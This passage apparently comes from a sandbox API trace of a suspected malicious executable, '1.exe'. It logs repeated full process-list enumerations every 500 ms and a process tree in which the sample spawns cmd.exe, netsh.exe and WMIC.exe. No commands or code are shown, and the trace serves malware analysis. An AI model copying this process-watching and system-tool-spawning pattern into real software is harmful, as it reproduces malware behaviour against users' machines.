1 [0144.838] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.839] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.839] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.840] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.841] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.841] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0144.842] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.843] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0144.843] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0144.844] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.845] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0144.845] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0144.846] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0144.847] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0144.847] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x42, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0144.848] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0144.848] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0144.849] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0144.850] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0144.850] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0144.851] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0144.852] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0144.852] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0144.853] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0144.853] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0144.854] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0144.855] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0144.855] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 0 [0144.856] CloseHandle (hObject=0x304) returned 1 [0144.856] Sleep (dwMilliseconds=0x1f4) [0145.577] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f4 [0145.582] Process32FirstW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.582] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0145.583] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0145.584] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.584] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0145.585] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.586] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0145.586] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0145.587] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0145.588] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0145.588] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0145.589] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.589] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.590] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0145.591] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x44, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.591] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.592] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.593] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.593] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.594] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.595] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.595] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.596] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.597] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.597] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0145.598] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.598] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0145.599] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0145.600] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.600] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0145.601] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0145.602] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0145.602] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0145.603] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x42, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0145.604] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0145.604] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0145.605] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0145.605] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0145.606] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0145.607] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0145.607] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0145.608] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0145.609] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0145.610] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0145.610] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0145.611] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0145.612] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 0 [0145.612] CloseHandle (hObject=0x2f4) returned 1 [0145.612] Sleep (dwMilliseconds=0x1f4) [0146.390] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x304 [0146.394] Process32FirstW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.395] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0146.396] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0146.396] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.397] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, 